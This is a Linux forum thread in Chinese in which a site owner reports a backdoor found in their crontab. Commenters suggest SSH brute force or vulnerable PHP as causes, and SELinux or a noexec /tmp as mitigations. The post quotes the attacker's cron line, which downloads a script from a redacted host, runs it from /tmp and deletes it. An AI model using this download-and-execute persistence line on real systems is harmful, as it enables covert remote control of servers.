PTT
Submit
Submit
选择语言
正體中文
简体中文
PTT
Linux
[问题] 被植入后门
楼主:
averywu
(看文不要只会用横的看)
2014-10-01 11:18:48
我的站台的crontab 被写入
@weekly wget http://x/bots/regulat.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh > /dev/null 2&1
目前已知不影响主机,因为URL已经失效了。
PS.贴出来的URL已经处理过了,domain我改成x,以防被误点。
但实在找不出他植入的方法,有人知道吗?
作者:
kenduest
(小州)
0000-00-00 00:00:00
这个还要查看其他点会比较好知道是哪边引起的常见比方帐号密码被猜中这种暴力 ssh 登入进来的或者是跑的 php 程式码有问题这类题外话若你是安装 rh-based 的版本有开 selinux 的话通常最后会因为 policy 设定不会允许 /tmp 内档案执行在 web server 环境上面的话比较能够减少后续问题
作者:
kenduest
(小州)
0000-00-00 00:00:00
这个还要查看其他点会比较好知道是哪边引起的常见比方帐号密码被猜中这种暴力 ssh 登入进来的或者是跑的 php 程式码有问题这类题外话若你是安装 rh-based 的版本有开 selinux 的话通常最后会因为 policy 设定不会允许 /tmp 内档案执行在 web server 环境上面的话比较能够减少后续问题
作者:
dayyeah
(帝耶)
0000-00-00 00:00:00
sh /tmp/sh不就爱干嘛干嘛了吗?他从regulat.bot抓下来
作者: dou0228 (7777)
0000-00-00 00:00:00
/tmp 可以用 -o noexec 防止 sh /tmp/sh
作者:
danny8376
(钓到一只猴子@_@)
0000-00-00 00:00:00
楼上 那是shell的行为 不是所有shell都会检查的
作者:
kenduest
(小州)
0000-00-00 00:00:00
noexec 比较适合于 binary 档案,script 似乎就......
继续阅读
[问题] 有办法用虚拟机开启双系统吗?
qas612820704
[问题] root VG 加入iscsi PV reboot 失败
Chopin5566
[问题] 如何得知所有LIBRARY的连结
linbanden
[问题] gmail判为spam- 421-4.7.0 rate limited
nov01
[分享] Line Client
carylorrk
Re: [分享] CVE-2014-6271 Bash Shell出现重大漏洞
chiouss
[问题] sar指令查看连线数
nonosun
[分享] Ubuntu Touch 手机将于今年问世
willrise
Re: [分享] CVE-2014-6271 Bash Shell出现重大漏洞
HamalAri
HackingThursday 固定聚会 (2014-10-02)
a0726h77
Links
booklink
Contact Us: admin [ a t ] ucptt.com